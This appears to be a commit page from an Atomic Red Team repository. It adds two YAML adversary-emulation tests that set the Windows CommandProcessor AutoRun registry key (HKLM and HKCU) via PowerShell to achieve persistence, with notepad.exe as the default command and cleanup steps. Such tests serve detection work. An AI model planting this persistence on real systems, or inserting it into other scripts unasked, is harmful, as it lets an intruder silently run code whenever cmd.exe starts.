security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added CommandProcessor Autorun (#2214)

Browse Source 
* Added CommandProcessor Autorun

* add an hcku version as well

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
BlueTeamOps
2022-11-02 02:25:17 +11:00
committed by GitHub
parent 2bdf7058a5
commit 5da061570e
1 changed files with 42 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1547.001/T1547.001.yaml
+42
View File
@@ -332,3 +332,45 @@ atomic_tests:
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
name: powershell
elevation_required: true
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
description: |-
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
supported_platforms:
- windows
input_arguments:
command:
description: Command to Execute
type: string
default: notepad.exe
executor:
command: |-
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
cleanup_command: |-
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
description: |-
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
supported_platforms:
- windows
input_arguments:
command:
description: Command to Execute
type: string
default: notepad.exe
executor:
command: |-
$path = "HKCU:\Software\Microsoft\Command Processor"
if (!(Test-Path -path $path)){
New-Item -ItemType Key -Path $path
}
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
cleanup_command: |-
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
name: powershell
elevation_required: true